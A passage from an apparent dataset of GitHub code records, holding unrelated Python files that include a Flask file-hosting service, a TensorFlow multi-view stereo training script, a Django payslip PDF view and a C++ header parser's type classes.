['ta','dew_point_temperature','wind_speed','hur','hus']\n for var in vars:\n dummy = initialize(variable = var)\n #Lat = Lat[:5] ### uncomment for testing \n #Lon = Lon[:3] \n res_average, res_anomaly = make_xarray()\n write_gridded_netCDF(res_average, res_anomaly )\n\n\n\n\n\n","repo_name":"MBlaschek/CEUAS","sub_path":"CEUAS/public/gridding/make_netCDF_griddedfile.py","file_name":"make_netCDF_griddedfile.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9323028425","text":"import os\nfrom datetime import datetime\nimport time\n\nimport hashlib\nfrom flask_login import current_user\nfrom flask import flash, redirect, url_for, send_file\nfrom sqlalchemy import desc\n\nfrom app import app, db\nfrom app.models import File, FilePath\n\n\nclass FileActions:\n\n def delete_file(self, file):\n file_name = file.filename\n file_path = FilePath.query.filter_by(id=file.filepath_id).first()\n db.session.delete(file)\n db.session.commit()\n file_path_file = File.query.filter_by(filepath_id=file_path.id).first()\n if not file_path_file:\n os.remove(file_path.filepath)\n os.removedirs(file_path.filepath[:-26])\n db.session.delete(file_path)\n db.session.commit()\n flash('File \"' + file_name + '\" is deleted', 'info')\n return redirect(url_for('user_files'))\n\n def download_file(self, file_id):\n file = File.query.filter_by(id=file_id).first()\n file_path = FilePath.query.filter_by(id=file.filepath_id).first().filepath\n file_name = file.filename\n if current_user.is_anonymous and not file.is_shared:\n flash('Access Denied!', 'danger')\n return redirect(url_for('login'))\n elif (current_user.is_anonymous and file.is_shared) or current_user.id == file.user_id or file.is_shared:\n return send_file(file_path, as_attachment=True, attachment_filename=file_name)\n else:\n return redirect(url_for('user_files'))\n\n def file_list(self, form):\n if form.validate_on_submit() and form.file_name.data != '':\n files = File.query.filter(File.user_id == current_user.id,\n File.filename.like(f'%{form.file_name.data}%'))\n else:\n files = File.query.filter_by(user_id=current_user.id).order_by(desc(File.uploadtime))\n return files\n\n def sharing(self, user_id, file_id, share: bool):\n file = File.query.filter_by(id=file_id).first()\n if user_id == file.user_id:\n file.is_shared = True if share else False\n return db.session.commit()\n else:\n return flash('Error', 'danger')\n\n def upload_file(self, request):\n if request.method == 'POST':\n file, temp_file_path = self._check_file(request)\n if file:\n file_exists, file_path = self._check_file_exists(file)\n if file_exists:\n os.remove(temp_file_path)\n filepath_id = FilePath.query.filter_by(filepath=file_path).first().id\n is_user_file = File.query.filter_by(filepath_id=filepath_id, user_id=current_user.id).first()\n if is_user_file:\n exists_name = is_user_file.filename\n flash('File already exists with name \"' + exists_name + '\"', 'warning')\n else:\n user_file = File(filepath_id=filepath_id, filename=file.filename, uploadtime=datetime.utcnow(),\n is_shared=False, user_id=current_user.id)\n db.session.add(user_file)\n db.session.commit()\n flash('File LINK added', 'success')\n else:\n os.rename(temp_file_path, file_path)\n filepath = FilePath(filepath=file_path)\n db.session.add(filepath)\n filepath = FilePath.query.filter_by(filepath=file_path).first()\n user_file = File(filepath_id=filepath.id, filename=file.filename, uploadtime=datetime.utcnow(),\n is_shared=False,\n user_id=current_user.id)\n db.session.add(user_file)\n db.session.commit()\n flash('File added', 'success')\n return redirect(request.url)\n\n def _check_file(self, request):\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part', 'warning')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file', 'warning')\n return redirect(request.url)\n temp_file_path = os.path.join(app.config['UPLOAD_FOLDER'], str(time.time()).replace('.', '-'))\n file.save(temp_file_path)\n return file, temp_file_path\n\n def _check_file_exists(self, file):\n md5_filename = hashlib.md5(file.read()).hexdigest()\n dir_for_file = os.path.join(app.config['UPLOAD_FOLDER'], md5_filename[0:3], md5_filename[3:6])\n if not os.path.exists(dir_for_file):\n os.makedirs(dir_for_file)\n new_filename = md5_filename[7:]\n file_path = os.path.join(dir_for_file, new_filename)\n return os.path.exists(file_path), file_path\n","repo_name":"arartemtem/flask-file-hosting","sub_path":"app/service/file_actions.py","file_name":"file_actions.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8757926678","text":"with open('output.txt') as inf:\n\tstring = inf.read().replace('\\n',' ').lower()\n\td = {}\n\tbig_key = \"\"\n\tbig_val = 1\n\tfor word in string.split():\n\t\tif word not in d.keys():\n\t\t\td[word] = 1\n\t\telse:\n\t\t\td[word] += 1\n\t\t\tif d[word] > big_val:\n\t\t\t\tbig_val = d[word]\n\t\t\t\tbig_key = word\n\t\t\telif d[word] == big_val and big_key > word:\n\t\t\t\tbig_val = d[word]\n\t\t\t\tbig_key = word\n\t\t\n\tprint(big_key, big_val)\n","repo_name":"nurSaadat/pythonLearning","sub_path":"oftenword_fileread.py","file_name":"oftenword_fileread.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"3378706780","text":"import manage\nimport time\nimport config\n\ndef control_loop():\n \"\"\"\n Main program loop. Refers to state of files in target directory at regular (five\n second) intervals and stores any changes. \n\n Arguments:\n dir_path (str): path of target directory\n \"\"\"\n configure = config.ConfigManager()\n dir_path = configure.get_target_path()\n temp_path = configure.get_temp_path()\n interval = configure.get_interval()\n\n try:\n manager = manage.FileManager(dir_path, temp_path)\n except manage.InvalidDirectoryError:\n return\n\n while True:\n time.sleep(interval)\n interval = configure.get_interval()\n active = configure.get_active()\n if dir_path != configure.get_target_path():\n dir_path = configure.get_target_path()\n manager.set_target_directory(dir_path)\n print(f\"Change to {dir_path}\")\n if not active or not manager.has_changed():\n print(f\"No changes (Active: {active})\")\n continue\n changes = manager.store_changes()\n print(changes)\n\n\nif __name__ == \"__main__\":\n control_loop()\n","repo_name":"LiamGraham/verdite","sub_path":"src/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"38563788338","text":"from django.shortcuts import render\nfrom .models import staff\n\n#for geting the pdf \nimport os\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\n\n# Create your views here.\n\ndef home(request):\n getstaff = staff.objects.all()\n\n context = {\n 'getstaff':getstaff\n }\n return render(request,'home.html',context)\n\n\ndef payslip(request,pk):\n pay = staff.objects.get(id=pk)\n template_path = 'payslip.html'\n logo = finders.find('logo.jpeg')\n context = {\n 'pay':pay,\n 'static':{\n 'logo':logo\n },\n }\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'filename=\"report.pdf\"'\n template = get_template(template_path)\n html = template.render(context)\n pisa_status = pisa.CreatePDF(\n html, dest=response)\n # if error then show some funny view\n if pisa_status.err:\n return HttpResponse('We had some errors
' + html + '
')\n return response\n#This code will convert the HTML to PDF\n\n\n\n\n","repo_name":"lagrandecode/oraclepayslip","sub_path":"payslip/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41103188765","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\nTraining script.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"]='2'\nimport time\nimport sys\nimport math\nimport argparse\nfrom random import randint\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python import debug as tfdbg\nfrom PIL import Image\n#from scipy.misc import imread\nfrom imageio import imread\nimport matplotlib.pyplot as plt\n\nfrom preprocess import *\nfrom model import *\n\n# paths\ntf.app.flags.DEFINE_string('data_root', 'X:/liujin_densematching/MVS_traindata/meitan_RS/train', \"\"\"Path to whu train dataset.\"\"\")\n\ntf.app.flags.DEFINE_string('log_dir', 'MVS_TRANING/tf_log',\n \"\"\"Path to store the log.\"\"\")\ntf.app.flags.DEFINE_string('model_dir', 'MVS_TRANING/tf_model',\n \"\"\"Path to save the model.\"\"\")\ntf.app.flags.DEFINE_boolean('use_pretrain', False,\n \"\"\"Whether to train.\"\"\")\ntf.app.flags.DEFINE_integer('ckpt_step', 110000,\n \"\"\"ckpt step.\"\"\")\n\n# input parameters\ntf.app.flags.DEFINE_integer('view_num', 3, \n \"\"\"Number of images (1 ref image and view_num - 1 view images).\"\"\")\ntf.app.flags.DEFINE_integer('max_d', 128,\n \"\"\"Maximum depth step when training.\"\"\")\ntf.app.flags.DEFINE_integer('max_w', 768, \n \"\"\"Maximum image width when training.\"\"\")\ntf.app.flags.DEFINE_integer('max_h', 384, \n \"\"\"Maximum image height when training.\"\"\")\ntf.app.flags.DEFINE_float('sample_scale', 0.5,\n \"\"\"Downsample scale for building cost volume.\"\"\")\ntf.app.flags.DEFINE_float('interval_scale', 2,\n \"\"\"Downsample scale for building cost volume.\"\"\")\ntf.app.flags.DEFINE_float('interval', 0.1, \n \"\"\"Depth interval for building cost volume.\"\"\")\n\n# training parameters\ntf.app.flags.DEFINE_integer('num_gpus', 1, \n \"\"\"Number of GPUs.\"\"\")\ntf.app.flags.DEFINE_integer('batch_size', 1, \n \"\"\"Training batch size.\"\"\")\ntf.app.flags.DEFINE_integer('epoch', 21, \n \"\"\"Training epoch number.\"\"\")\ntf.app.flags.DEFINE_float('val_ratio', 0, \n \"\"\"Ratio of validation set when splitting dataset.\"\"\")\ntf.app.flags.DEFINE_float('base_lr', 0.001,\n \"\"\"Base learning rate.\"\"\")\ntf.app.flags.DEFINE_integer('display', 1,\n \"\"\"Interval of loginfo display.\"\"\")\ntf.app.flags.DEFINE_integer('stepvalue', 5000,\n \"\"\"Step interval to decay learning rate.\"\"\")\ntf.app.flags.DEFINE_integer('snapshot', 5000,\n \"\"\"Step interval to save the model.\"\"\")\ntf.app.flags.DEFINE_float('gamma', 0.9,\n \"\"\"Learning rate decay rate.\"\"\")\n\nFLAGS = tf.app.flags.FLAGS\n\nclass MVSGenerator:\n \"\"\" data generator class, tf only accept generator without param \"\"\"\n def __init__(self, sample_list, view_num):\n self.sample_list = sample_list\n self.view_num = view_num\n self.sample_num = len(sample_list)\n self.counter = 0\n \n def __iter__(self):\n while True:\n for data in self.sample_list: \n start_time = time.time()\n\n ###### read input data ######\n images = []\n cams = []\n for view in range(self.view_num):\n image = image_augment(Image.open(data[2 * view]))\n image = center_image(image)\n cam = tr_load_cam(open(data[2 * view + 1]), FLAGS.interval_scale)\n images.append(image)\n cams.append(cam)\n\n depimg = imread(os.path.join(data[2 * self.view_num]))\n depth_image = (np.float32(depimg) / 64.0) # WHU MVS dataset\n\n scaled_cams = scale_mvs_camera(cams, scale=FLAGS.sample_scale)\n\n # mask out-of-range depth pixels (in a relaxed range)\n depth_start = cams[0][1, 3, 0] + cams[0][1, 3, 1]\n depth_end = cams[0][1, 3, 0] + (FLAGS.max_d - 2) * cams[0][1, 3, 1]#\n depth_image = mask_depth_image(depth_image, depth_start, depth_end)\n\n # return mvs input\n self.counter += 1\n duration = time.time() - start_time\n images = np.stack(images, axis=0)\n scaled_cams = np.stack(scaled_cams, axis=0)\n\n yield (images, scaled_cams, cams, depth_image)\n\ndef average_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n Note that this function provides a synchronization point across all towers.\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n average_grads.append(grad_and_var)\n return average_grads\n\ndef train(traning_list):\n \"\"\" training rednet \"\"\"\n training_sample_size = len(traning_list)\n print ('sample number: ', training_sample_size)\n\n with tf.Graph().as_default(), tf.device('/cpu:0'): \n\n ########## data iterator #########\n # training generators\n training_generator = iter(MVSGenerator(traning_list, FLAGS.view_num))\n generator_data_type = (tf.float32, tf.float32, tf.float32, tf.float32)\n # dataset from generator\n training_set = tf.data.Dataset.from_generator(lambda: training_generator, generator_data_type)\n training_set = training_set.batch(FLAGS.batch_size)\n training_set = training_set.prefetch(buffer_size=1)\n # iterators\n training_iterator = training_set.make_initializable_iterator()\n\n ########## optimization options ##########\n global_step = tf.Variable(0, trainable=False, name='global_step')\n lr_op = tf.train.exponential_decay(FLAGS.base_lr, global_step=global_step, \n decay_steps=FLAGS.stepvalue, decay_rate=FLAGS.gamma, name='lr')\n opt = tf.train.RMSPropOptimizer(learning_rate=lr_op)\n\n tower_grads = []\n for i in range(FLAGS.num_gpus):\n with tf.device('/gpu:%d' % i):\n with tf.name_scope('Model_tower%d' % i) as scope:\n # generate data\n images, scale_cams, cams, depth_image = training_iterator.get_next()\n images.set_shape(tf.TensorShape([None, FLAGS.view_num, None, None, 3]))\n scale_cams.set_shape(tf.TensorShape([None, FLAGS.view_num, 2, 4, 4]))\n cams.set_shape(tf.TensorShape([None, FLAGS.view_num, 2, 4, 4]))\n depth_image.set_shape(tf.TensorShape([None, None, None, 1]))\n depth_start = tf.reshape(\n tf.slice(scale_cams, [0, 0, 1, 3, 0], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size])\n depth_interval = tf.reshape(\n tf.slice(scale_cams, [0, 0, 1, 3, 1], [FLAGS.batch_size, 1, 1, 1, 1]), [FLAGS.batch_size])\n\n is_master_gpu = False\n if i == 0:\n is_master_gpu = True\n\n ## inference\n # probability volume\n prob_volume = inference_prob_recurrent(\n images, scale_cams, FLAGS.max_d, depth_start, depth_interval, is_master_gpu)\n\n # classification loss\n loss, mae, less_one_accuracy, less_three_accuracy, depth_map = \\\n tr_classification_loss(\n prob_volume, depth_image, FLAGS.max_d, depth_start, depth_interval)\n\n # retain the summaries from the final tower.\n summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)\n\n # calculate the gradients for the batch of data on this CIFAR tower.\n grads = opt.compute_gradients(loss)\n\n # keep track of the gradients across all towers.\n tower_grads.append(grads)\n \n # average gradient\n grads = average_gradients(tower_grads)\n \n # training opt\n train_opt = opt.apply_gradients(grads, global_step=global_step)\n\n # summary \n summaries.append(tf.summary.scalar('loss', loss))\n summaries.append(tf.summary.scalar('less_one_meter_accuracy', less_one_accuracy))\n summaries.append(tf.summary.scalar('less_three_interval_accuracy', less_three_accuracy))\n summaries.append(tf.summary.scalar('lr', lr_op))\n weights_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n for var in weights_list:\n summaries.append(tf.summary.histogram(var.op.name, var))\n for grad, var in grads:\n if grad is not None:\n summaries.append(tf.summary.histogram(var.op.name + '/gradients', grad))\n \n # saver\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=None) \n summary_op = tf.summary.merge(summaries)\n\n # initialization option\n init_op = tf.global_variables_initializer()\n config = tf.ConfigProto(allow_soft_placement = True)\n config.gpu_options.allow_growth = True\n\n with tf.Session(config=config) as sess: \n \n # initialization\n total_step = 0\n sess.run(init_op)\n summary_writer = tf.summary.FileWriter(FLAGS.log_dir, sess.graph)\n\n # load pre-trained model\n if FLAGS.use_pretrain:\n pretrained_model_path = os.path.join(FLAGS.model_dir, 'model.ckpt')\n restorer = tf.train.Saver(tf.global_variables())\n restorer.restore(sess, '-'.join([pretrained_model_path, str(FLAGS.ckpt_step)]))\n print('Pre-trained model restored from %s' %\n ('-'.join([pretrained_model_path, str(FLAGS.ckpt_step)])))\n total_step = FLAGS.ckpt_step\n\n # training several epochs\n for epoch in range(FLAGS.epoch):\n\n # training of one epoch\n step = 0\n sess.run(training_iterator.initializer)\n for _ in range(int(training_sample_size / FLAGS.num_gpus)):\n\n # run one batch\n start_time = time.time()\n try:\n out_summary_op, out_opt, out_loss, out_less_one, out_less_three = sess.run(\n [summary_op, train_opt, loss, less_one_accuracy, less_three_accuracy])\n except tf.errors.OutOfRangeError:\n print(\"End of dataset\") # ==> \"End of dataset\"\n break\n duration = time.time() - start_time\n\n # print info\n if step % FLAGS.display == 0:\n print('epoch, %d, step %d, total_step %d, loss = %.4f, (< 1m) = %.4f, (< 3px) = %.4f (%.3f sec/step)' %\n (epoch, step, total_step, out_loss, out_less_one, out_less_three, duration))\n \n # write summary\n if step % (FLAGS.display * 10) == 0:\n summary_writer.add_summary(out_summary_op, total_step)\n \n # save the model checkpoint periodically\n if (total_step % FLAGS.snapshot == 0 or step == (training_sample_size - 1)):\n model_folder = os.path.join(FLAGS.model_dir)\n if not os.path.exists(model_folder):\n os.mkdir(model_folder)\n ckpt_path = os.path.join(model_folder, 'model.ckpt')\n print('Saving model to %s' % ckpt_path)\n saver.save(sess, ckpt_path, global_step=total_step)\n step += FLAGS.batch_size * FLAGS.num_gpus\n total_step += FLAGS.batch_size * FLAGS.num_gpus\n\ndef main(argv=None):\n \"\"\" program entrance \"\"\"\n\n # Prepare all training samples\n sample_list = gen_train_mvs_list(FLAGS.data_root)\n\n # Shuffle\n random.shuffle(sample_list)\n\n # Training entrance.\n train(sample_list)\n\n\nif __name__ == '__main__':\n\n print ('Training RED-Net with %d views' % FLAGS.view_num)\n\n tf.app.run()","repo_name":"gpcv-liujin/REDNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13546,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"85"} +{"seq_id":"5658893269","text":"import argparse\nimport logging\n\n\ndef arg_required(arg):\n if arg is None : \n logging.warning(\"can't find \" + arg)\n exit\n\ndef get_arguments(): \n parser = argparse.ArgumentParser(\"jinja_swagger\")\n parser.add_argument(\"-a\",\"--api_name\", help=\"Enter API Name (i.e: Navy USM Current Occupation)\")\n parser.add_argument(\"-c\",\"--csv\", help=\"api.csv is the default to overwrite us\")\n parser.add_argument(\"-mo\",\"--main_object\", help=\"The main object name not returned in the JSON \")\n parser.add_argument(\"-t\",\"--type\", help=\"type array or object\")\n parser.add_argument(\"-s\",\"--select_by\", help=\"Select by ID \")\n parser.add_argument(\"-ns\",\"--nested_object\", help=\"Object Name in the JSON\")\n parser.add_argument(\"-d\",\"--debug\", help= \"show debug information\")\n args = parser.parse_args()\n\n\n if args.debug is not None:\n logging.Logger.setLevel(logging.DEBUG)\n\n arg_required(args.csv) \n arg_required(args.api_name)\n arg_required(args.select_by) \n arg_required(args.nested_object)\n\n return args","repo_name":"hanymorcos/jinja_csv","sub_path":"helpers/arg_procesor.py","file_name":"arg_procesor.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14805321150","text":"# Search for glyphs with \"ss\" in their suffix, create stylistic\n# sets feature code for them, and copy it to clipboard.\n\nimport mojo\nfrom AppKit import NSPasteboard, NSArray\n\nf = CurrentFont()\n\nsets = []\nfeatures = \"\"\n\nfor g in f.keys():\n if \".\" in g:\n if \"ss\" in g.split(\".\")[1] and g.split(\".\")[1] not in sets:\n sets.append(g.split(\".\")[1])\n\nsets.sort()\n\nfor set in sets:\n features += \"feature %s {\\n\" % set\n for g in f:\n if set in g.name:\n base = g.name.split(\".\")[0]\n suffix = g.name.split(\".\")[1]\n features += \"sub %s by %s;\\n\" % (base, g.name)\n features += \"} %s;\\n\\n\" % set\n\nif features != \"\":\n p = NSPasteboard.generalPasteboard()\n p.clearContents()\n a = NSArray.arrayWithObject_(features)\n p.writeObjects_(a)\n mojo.UI.Message('Stylistic sets features copied to your clipboard')\n\nif features == \"\":\n mojo.UI.Message(\"Could not find properly named glyphs.\")","repo_name":"ryanbugden/Misc-Robofont-Scripts","sub_path":"write_stylistic_sets.py","file_name":"write_stylistic_sets.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40459439413","text":"from twe import *\n\nopts = Options()\nopts.save_path = \"../output/model/sou\"\nopts.train_data = \"../data/sou/train.dat\"\nopts.test_data = \"../data/sou/test.dat\"\n\nopts.start_time = -5679590961\nopts._start_time = -5679590961\nopts.end_time = 1138662000\nopts._end_time = 1138662000\nopts.time_transform = 681825296\n\nopts.nclst = 200\nopts.clst_window = 30\n\nopts.nepochs = 200\n\nopts.batch_size = 100\nopts.epoch_size = 100000\n\nopts.window_size = 20\nopts.max_pairs_from_sample = 100\nopts.max_same_target = 10\n\nmain(opts)\n","repo_name":"w-is-h/stwe","sub_path":"tests/test_sou.py","file_name":"test_sou.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19364516069","text":"from response.generic_response import GenericResponse\n\n\nclass ErrorResponse(GenericResponse):\n ERROR_TYPE = 'error'\n\n def __init__(self, req_id: int, code: int, error: str):\n GenericResponse.__init__(self, req_id=req_id, properties={})\n self.response_type = self.ERROR_TYPE\n self.error_code = code\n self.error_message = error\n","repo_name":"migdea11/ibapi_handler","sub_path":"response/error_response.py","file_name":"error_response.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19581036687","text":"# 8:50 ~ 9:50\nfrom collections import deque \n\nn, m = map(int, input().split())\n\narr_map = []\nfor _ in range(n):\n arr_map.append(list(map(int,input())))\n\ndef dfs(arr_map):\n x, y = 0, 0\n \n dx = [-1,0,1,0]\n dy = [0,-1,0,1]\n queue = deque()\n queue.append((x,y))\n\n while queue:\n x, y = queue.popleft()\n \n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < m:\n if nx == n - 1 and ny == m - 1:\n return arr_map[x][y] + 1\n\n if arr_map[nx][ny] == 1:\n arr_map[nx][ny] = arr_map[x][y] + 1\n queue.append((nx,ny))\n return False\n\nres = dfs(arr_map)\nprint(res)\n\n \n\n\n","repo_name":"daunjeong824/Practice_Algorithm","sub_path":"BFS_DFS/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40861954871","text":"import math\nimport sys\n\nN = int(sys.stdin.readline().rstrip())\nnumbers = list(map(int, sys.stdin.readline().rstrip().split()))\n\nprime_numbers = []\n\nfor i in range(2, 1001):\n prime = True\n for j in range(2, int(math.sqrt(i) + 1)):\n if i % j == 0:\n prime = False\n\n if prime:\n prime_numbers.append(i)\n\ncount = 0\n\nfor num in numbers:\n if num in prime_numbers:\n count += 1\n\nprint(count)\n","repo_name":"KakaoFarm/unan-python-algorithm-study","sub_path":"BOJClass2/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8567068409","text":"#!/usr/bin/python3\n'''\nqueries the Reddit API and\nreturns the number of subscribers\n'''\nimport requests\n\n\ndef top_ten(subreddit):\n headers = {\n 'User-Agent': 'My User Agent 1.0'\n }\n URL = \"https://www.reddit.com/r/{}/top.json?limit=10\".format(subreddit)\n try:\n reddit_data = requests.get(url=URL, headers=headers)\n all_data = reddit_data.json().get('data').get('children')\n print('a')\n titles = []\n print('b')\n for i in all_data:\n if i.get('data').get('title'):\n titles.append(i.get('data').get('title'))\n\n print(i)\n print('c')\n for t in titles:\n print(t)\n except:\n print('None')\n","repo_name":"SoniaChevli/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21464485999","text":"from typing import List\n\nfrom transformers import T5Tokenizer, T5Model\nimport torch\nimport numpy as np\n\n\nclass SentenceT5:\n \"\"\"Class to use the [sentence-t5-base-ja-mean-token](https://huggingface.co/sonoisa/sentence-t5-base-ja-mean-tokens)\n \"\"\"\n def __init__(self, model_name_or_path: str, device=None):\n self.tokenizer = T5Tokenizer.from_pretrained(model_name_or_path, is_fast=False)\n self.model = T5Model.from_pretrained(model_name_or_path).encoder\n self.model.eval()\n\n if device is None:\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.device = torch.device(device)\n self.model.to(device)\n\n def _mean_pooling(self, model_output, attention_mask):\n token_embeddings = model_output[0] #First element of model_output contains all token embeddings\n input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()\n return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)\n\n @torch.no_grad()\n def encode(self, docs: List[str], batch_size=8):\n all_embeddings = []\n iterator = range(0, len(docs), batch_size)\n for batch_idx in iterator:\n batch = docs[batch_idx:batch_idx + batch_size]\n\n encoded_input = self.tokenizer.batch_encode_plus(\n batch,\n max_length=4096,\n padding=\"longest\",\n truncation=True,\n return_tensors=\"pt\").to(self.device)\n model_output = self.model(**encoded_input)\n sentence_embeddings = self._mean_pooling(model_output, encoded_input[\"attention_mask\"]).to('cpu')\n\n all_embeddings.extend(sentence_embeddings)\n\n return torch.stack(all_embeddings)\n","repo_name":"nptdat/llm_retrieval_jawiki","sub_path":"llm_retrieval/src/qa/vectorizer/internal_model/sentence_t5.py","file_name":"sentence_t5.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"42897908346","text":"import typing\nfrom dataclasses import dataclass, field\n\n\n@dataclass\nclass Token:\n \"\"\"\n In an ideal world, this Token class would not be exposed via the user\n visible API. Unfortunately, getting to that point would take a significant\n amount of effort.\n\n It is not expected that these will change, but they might.\n\n At the moment, the only supported use of Token objects are in conjunction\n with the ``tokfmt`` function. As this library matures, we'll try to clarify\n the expectations around these. File an issue on github if you have ideas!\n \"\"\"\n\n #: Raw value of the token\n value: str\n\n #: Lex type of the token\n type: str = field(repr=False, compare=False, default=\"\")\n\n\n@dataclass\nclass Value:\n \"\"\"\n A unparsed list of tokens\n\n .. code-block:: c++\n\n int x = 0x1337;\n ~~~~~~\n \"\"\"\n\n #: Tokens corresponding to the value\n tokens: typing.List[Token]\n\n\n@dataclass\nclass NamespaceDecl:\n \"\"\"\n Namespace declarations\n\n .. code-block:: c++\n\n namespace foo::bar {}\n ~~~~~~~~\n \"\"\"\n\n #: These are the names (split by ::) for this namespace declaration,\n #: but does not include any parent namespace names\n #:\n #: An anonymous namespace is an empty list\n names: typing.List[str]\n inline: bool = False\n\n\n@dataclass\nclass DecltypeSpecifier:\n \"\"\"\n Contents of a decltype (inside the parentheses)\n\n .. code-block:: c++\n\n decltype(Foo::Bar)\n ~~~~~~~~\n \"\"\"\n\n #: Unparsed tokens within the decltype\n tokens: typing.List[Token]\n\n\n@dataclass\nclass FundamentalSpecifier:\n \"\"\"\n A specifier that only contains fundamental types\n \"\"\"\n\n name: str\n\n\n@dataclass\nclass NameSpecifier:\n \"\"\"\n An individual segment of a type name\n\n .. code-block:: c++\n\n Foo::Bar\n ~~~\n\n \"\"\"\n\n name: str\n\n specialization: typing.Optional[\"TemplateSpecialization\"] = None\n\n\n@dataclass\nclass AutoSpecifier:\n \"\"\"\n Used for an auto return type\n \"\"\"\n\n name: str = \"auto\"\n\n\n@dataclass\nclass AnonymousName:\n \"\"\"\n A name for an anonymous class, such as in a typedef. There is no string\n associated with this name, only an integer id. Things that share the same\n anonymous name have anonymous name instances with the same id\n \"\"\"\n\n #: Unique id associated with this name (only unique per parser instance!)\n id: int\n\n\nPQNameSegment = typing.Union[\n AnonymousName, FundamentalSpecifier, NameSpecifier, DecltypeSpecifier, AutoSpecifier\n]\n\n\n@dataclass\nclass PQName:\n \"\"\"\n Possibly qualified name of a C++ type.\n \"\"\"\n\n #: All of the segments of the name. This is always guaranteed to have at\n #: least one element in it. Name is segmented by '::'\n #:\n #: If a name refers to the global namespace, the first segment will be an\n #: empty NameSpecifier\n segments: typing.List[PQNameSegment]\n\n #: Set if the name starts with class/enum/struct\n classkey: typing.Optional[str] = None\n\n #: Set to true if the type was preceded with 'typename'\n has_typename: bool = False\n\n\n@dataclass\nclass Enumerator:\n \"\"\"\n An individual value of an enumeration\n \"\"\"\n\n #: The enumerator key name\n name: str\n\n #: None if not explicitly specified\n value: typing.Optional[Value] = None\n\n #: Documentation if present\n doxygen: typing.Optional[str] = None\n\n\n@dataclass\nclass EnumDecl:\n \"\"\"\n An enumeration type\n \"\"\"\n\n typename: PQName\n\n values: typing.List[Enumerator]\n\n base: typing.Optional[PQName] = None\n\n #: Documentation if present\n doxygen: typing.Optional[str] = None\n\n #: If within a class, the access level for this decl\n access: typing.Optional[str] = None\n\n\n@dataclass\nclass TemplateArgument:\n \"\"\"\n A single argument for a template specialization\n\n .. code-block:: c++\n\n Foo\n ~~~\n\n \"\"\"\n\n #: If this argument is a type, it is stored here as a DecoratedType,\n #: otherwise it's stored as an unparsed set of values\n arg: typing.Union[\"DecoratedType\", \"FunctionType\", 